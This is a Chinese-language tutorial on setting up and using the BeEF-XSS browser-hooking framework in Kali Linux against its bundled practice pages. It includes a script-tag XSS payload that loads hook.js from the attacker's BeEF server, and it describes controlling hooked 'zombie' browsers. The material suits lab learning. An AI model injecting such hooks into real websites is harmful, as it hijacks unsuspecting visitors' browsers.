一、首次使用

在kali中搜索 beefxss，就能找到。

在这里插入图片描述

单击打开，会自动运行「beef-xss 服务」，并打开Web界面。

提示：如果弹出的Web界面提示链接失败，可以关掉终端命令行，重新打开一次beef xss。

在这里插入图片描述

换成kali虚拟机的IP，也可以在物理机上访问Web界面：http://127.0.0.1:3000/ui/panel

在这里插入图片描述

二、修改账号密码

初次使用会让你设置密码，如果密码忘了，可以到 /usr/share/beef-xss/config.yaml 查看，这是Beff-xx的「配置文件」，用来保存版本、密码等配置信息。

在这里插入图片描述

修改密码可以直接修改文件中passwd这个字段，重启beef-xx服务后生效。

# 1、编辑配置文件，修改passwd字段
vim /usr/share/beef-xss/config.yaml
# 2、重启beef-xss服务
systemctl restart beef-xss

Beef-xss自带两个「练习页面」：

复制链接到kali虚拟机即可访问。

如果想在物理机访问，就把链接中的IP改成kali虚拟机的IP。

在这里插入图片描述

Beef-xss的打开界面中，给我们提供了一个范例，我们在目标网页「提交」这行JS代码，就可以使用工具了。

提交的时候记得把IP改成部署Beff-xss的主机IP。

在这里插入图片描述

我们拿第一个练习页面来举例，提交代码 <script src="http://192.168.31.101:3000/hook.js"></script>。

在这里插入图片描述

提交后，Beff-xss的Web界面，会多出一个「在线浏览器」。

在这里插入图片描述

把练习页面关掉，这个IP就会从在线浏览器中消失，进入「离线浏览器」。

在这里插入图片描述

再次打开练习页面，就会重新进入在线浏览器。

这就意味着，提交了XSS的网页，只有打开时，才可以被利用，关掉就不可利用。

beef-XSS界面有很多栏，重点是 Commands 栏的功能指令，其他的基本用不到，不用太留意。

在这里插入图片描述

Online Browsers：在线浏览器，工具定时发送链接请求，链接成功就会显示在这里。
Offline Browsers：离线浏览器
Getting Started：入门指南，官方的一些文档
Logs：日志，记录工具做过哪些操作
Zombies：僵尸，记录可以利用的目标站点
Current Browser：上线的浏览器，只有在目标在线的时候才会显示出来。
Details：细节，展示目标的IP、版本等信息
Logs：日志，记录目标浏览器做过哪些操作
Commands：指令，工具的核心，不同的指令对应不同的操作
– Module Tree：模块树，可以使用的模块功能
– Module Result History：模块使用记录
– XXX：指令描述，解释这个功能是干什么用的，怎么使用